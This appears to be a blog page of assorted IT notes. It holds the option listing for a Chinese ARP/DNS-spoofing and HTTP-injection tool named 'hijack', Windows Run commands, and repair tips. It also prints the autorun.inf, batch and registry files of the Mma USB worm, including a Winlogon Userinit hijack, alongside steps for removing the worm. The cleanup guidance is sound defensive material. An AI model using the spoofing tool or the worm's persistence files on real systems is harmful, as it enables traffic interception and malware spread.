渗透工具hijack使用及下载

usage: hijack <-LVXhefvqsxrkHDtNzoi> <-d dev> <-S interval> <-l logfile>
<-W normal|byline|none> <-F jobfile> <-p port> <-c http_flag>
<-IO pcap_dump> <-E quit time> <-R reboot time>
<-b submask> <-m speed>
|
-h is help/usage 显示帮助信息
-V is version information 显示版本信息
-v is be verbose 程序运行时显示详细信息
-q is be quiet (don't print packet reception hash marks) 安静模式，不显示数据包标识
-e is show empty packets 显示空的数据包
-o is fixed '\0' after replace data offset 替换数据后，被替换的数据后都用空字节'\0'填充
-i is ignore case 忽略大小写进行匹配
-S is spoof interval default is 3000 ms 设置发送RARP欺骗的时间间隔,不能设太大，不然程序会死，条件竞争问题 针对攻击一些反ARP欺骗的主机, 越小越好
-l is set logfile to record 设置日专记录文件，日志记录文件将程序运行输出的内容再记录的文件里
-r is enabled ip routing 开启系统内置的路由功能，只能嗅探，不能修改数据包
-b is to force define submask 强制指定子网掩码，对一些跨网段的欺骗有效
-m is define max transmit speed k/s 限制最大网络传输速度 k/s
-f is set full spoof-route mode default is half 设置欺骗方式为双向欺骗
-x is print in alternate hexdump format 打印出来的数据为十六进制
-X is interpret match e-xpression as hexadecimal 设置要匹配的字串为十六进制，如0x0d0a00
-p is the port to hijack 设置要进行数据劫持的端口，默认为全部
-c is the flag string to insert for http hijack 要插入代码的HTTP响应包的特征字符串,默认为200 OK
-I is read packet stream from pcap format file pcap_dump 从一个pcap数据包格式的文件里读取数据包，进行离线嗅探
-D is dnsspoof mode 模式改变为DNS欺骗，规则文件格式不变
-t is print timestamp every time a packet is matched 当有匹配的数据包时，打出时间戳
-E is time to quit # 程序自动退出的时间间隔，按秒计算
-R is time to reboot program # 程序自动重新启动的时间间隔，按秒计算
-N is release demo job file 释放一规则文件
-s is scan hosts in subnet 扫描子网
-H is hidden from console, background mode killed /k 从控制台隐藏到后到执行，可以用hijack -k 结束
-k is killed a exists instance 结束一个存在的实例
-O is dump matched packets in pcap format to pcap_dump 保存匹配的数据包到一个pcap数据包格式的文件里
-W is set the dump format (normal, byline, none) 设置数据包显示的格式，一般，按行，无格式三种
-F is read the filter from the specified file 从指定的文件里读取规则
-z is IP faked mode genuine and faked host variable auto switch full spoof# 进行IP伪造genuine host 和 faked host生效, 自动打开全双工选项
-d is use specified device (index) 使用指定网卡的索引号
-L is show the winpcap device list index 显示网卡列表

开始→运行→输入的命令集锦

gpedit.msc-----组策略
sndrec32-------录音机
Nslookup-------IP地址侦测器
explorer-------打开资源管理器
logoff---------注销命令
tsshutdn-------60秒倒计时关机命令
lusrmgr.msc----本机用户和组
services.msc---本地服务设置
oobe/msoobe /a----检查XP是否激活
notepad--------打开记事本
cleanmgr-------垃圾整理
net start messenger----开始信使服务
compmgmt.msc---计算机管理
net stop messenger-----停止信使服务
conf-----------启动 netmeeting
dvdplay--------DVD播放器
charmap--------启动字符映射表
diskmgmt.msc---磁盘管理实用程序
calc-----------启动计算器
dfrg.msc-------磁盘碎片整理程序
chkdsk.exe-----Chkdsk磁盘检查
devmgmt.msc--- 设备管理器
regsvr32 /u *.dll----停止dll文件运行
drwtsn32------ 系统医生
rononce -p ----15秒关机
dxdiag---------检查DirectX信息
regedt32-------注册表编辑器
Msconfig.exe---系统配置实用程序
rsop.msc-------组策略结果集
mem.exe--------显示内存使用情况
regedit.exe----注册表
winchat--------XP自带局域网聊天
progman--------程序管理器
winmsd---------系统信息
perfmon.msc----计算机性能监测程序
winver---------检查Windows版本
sfc /scannow-----扫描错误并复原
taskmgr-----任务管理器（2000／xp／2003）

Lotus Notes - Archive Setting

DLA - Drive Letter Access

• Drag and drop files directly to a recordable CD or DVD
• Process, format, and burn in one easy step
• Save files and folders to your recorder drive
• Share and transfer information inexpensively and quickly
• Make CD-R discs readable by virtually any CD-ROM drive
  

Drive Letter Access (DLA) turns your CDs and DVDs into virtual hard drives. Burning is easy - and there's no need to pre-stage files. Just drag and drop your data directly to a recordable CD or DVD, then process, format, and burn in one simple step. The final disc will be compatible with almost any Windows computer!

Two Type of Format
UDF - Allowed to read, write and delete.
CDFS - Only allowed read, not allowed write and delete.

禁止或允许用户修改IE首页

运行注册表编辑器(开始菜单－运行－regedit-确定), 打开[HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel], 其实一般此键是不存在的, 只存在[HKEY_CURRENT_USER\Software\Policies\Microsoft], 所以后面一截你要自己建立, 主键建立完后在Control Panel键下新建一个DWORD值数据, 键名为HOMEPAGE(不分大小写), 键值为1. 此时你打开IE属性时可以发现它改首页设置的部分已经不可用了.

Infected With Autorun.inf, Mma.bat, Mma.rar, Mma.reg Mma.vbs

autorun.inf
Code:
[autorun]
open=
shell\open=Open(Sub7@Chatx.net)
shell\open\Command=WScript.exe .\mma.vbs
shell\open\Default=1
shell\explore=explore(Sub7@Chatx.net)
shell\explore\Command=WScript.exe .\mma.vbs


mma.bat
Code:
@echo off
if exist .\mma.reg regedit /s .\mma.reg
if not "%1"=="" goto open
if exist mma.vbs start WScript.exe mma.vbs&exit
if exist %SYSTEMROOT%\system32\mma.vbs start WScript.exe %SYSTEMROOT%\system32\mma.vbs&exit
exit
:open
if not "%1"=="Open" goto next
start explorer .\
exit
:next
if "%1"=="+" attrib +s +a +h +r %2\mma.*
if "%1"=="+" attrib +s +a +h +r %2\autorun.inf
:end


mma.reg
Code:
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Userinit"="userinit.exe,mma.bat"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"ShowSuperHidden"=dword:00000000


mma.vbs
Code:
'dranyamcram v1.0
'Davao City Phils
'September 3, 2007
'Sub7@ChatX.net

on error resume next
Set WshShell =CreateObject("WScript.Shell")


For i=1 to 1

set Of = CreateObject("Scripting.FileSystemObject")
set dir = Of.GetSpecialFolder(1)

Solution 1
Download Flash_Disinfector.exe by sUBs and save it to your desktop.

• Double-click Flash_Disinfector.exe to run it and follow any prompts that may appear.
• The utility may ask you to insert your flash drive and/or other removable drives. Please do so and allow the utility to clean up those drives as well.
• Wait until it has finished scanning and then exit the program.
• Reboot your computer when done.

Note: Flash_Disinfector will create a hidden folder named autorun.inf in each partition and every USB drive plugged in when you ran it. Don't delete this folder...it will help protect your drives from future infection.

Reboot your computer in "Safe Mode" or "Safe Mode With Command Prompt" using the F8 method. To do this, restart your computer and after hearing your computer beep once during startup (but before the Windows icon appears) press the F8 key repeatedly. A menu will appear with several options. Use the arrow keys to navigate and select the option to run Windows in "Safe Mode With Command Prompt".

Go to Start > Run and type: cmd

• press Ok.
• At the command prompt, type in your primay drive location, usually C:
• You may need to change the directory. If so type: cd \
• Hit Enter.
• Type: attrib -s -h -r -a autorun.inf
• Hit Enter.
• Type: dir
• Hit Enter. This will allow you to see and confirm the Autorun files.
• Type: del autorun.inf
• Hit Enter.
• Repeat the above commands for each drive on your computer.

Now search for and remove Mma.vbs, Mma.rar, Mma.regm Mma.bat if present.

• At the command prompt, type in your primay drive location, usually C:
• Hit Enter.
• Type: attrib -s -h -r -a Mma.vbs
• Hit Enter.
• Type: dir /s Mma.vbs
• Hit Enter.
• If the file is present, type: del Mma.vbs
• Hit Enter.
• Repeat the above commands for each drive on your computer.
• Then repeat these instructions for Mma.rar, Mma.regm Mma.bat
• Exit the command prompt and reboot normally.

Solution 2
Do the following:

1. Run Task Manager (Ctrl-Alt-Del or right click on Taskbar)
2. Stop wscript.exe process if available by highlight mo lang ang process tapos press END TASK
3. Then terminate explorer.exe process.
4. In Task Manager, click on File -> New Task (Run…).
5. Type “cmd” (without quotes) into the Open text box and click OK.
6. Type the following command one by one followed by hitting Enter key:

Code:
del c:\autorun.* /f /s /q /a
del d:\autorun.* /f /s /q /a


Assuming hangang drive f yung iyong PC del f:\autorun.* /f /s /q /a

7. In Task Manager, click on File -> New Task (Run…).
8. Type regedit into the Open text box and click OK.
9. Navigate to the following registry key:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon

10) Check mo eto:

“Userinit”=”C:\WINDOWS\system32\userinit.exe,”

Dapat ganyan ang nakalagay sa registry. Pag merong nakasabay na iba like mma.bat delete mo lang.


11) Restart your computer in safe mode

12) Disable Restore mode

13) Open Notepad and copy the following:

attrib -H -R c:\mma.bat
attrib -H -R c:\mma.rar
attrib -H -R c:\mma.reg
attrib -H -R c:\mma.vbs
attrib -H -R d:\mma.bat
attrib -H -R d:\mma.rar
attrib -H -R d:\mma.reg
attrib -H -R d:\mma.vbs


If madami ang iyong drives continue mo lang.. (like attrib -H -R f:\mma.vbs


14) Save it to "remove.bat" then double click. (in this way makita mo na yung mga files)

15) Punta ka na sa mga root directory ng drives and delete mo na eto lahat:

Code:
mma.bat
mma.rar
mma.reg
mma.vbs

IBM PC with 3 Beeping

IBM PC with 3 Beeping sound. 1 long and 2 short.

As per normal just reseated the RAMs and problem can be resolved.

Tried to swap all the parts and reseated the Graphic card & RAMs but problem still remain.

Flush the BIOS to latest and resolved.

Note: the first boot IBM logo displayed in abnormal

Printer - Excel document printed in irrecognizable codec

Lexmark Network Printer, some Excel document printed in unrecognizable coder but tried to print to others brand printer like HP, it is working.

Deleted the old printer setting. Install the latest driver and add the printer again.

Problem resolved.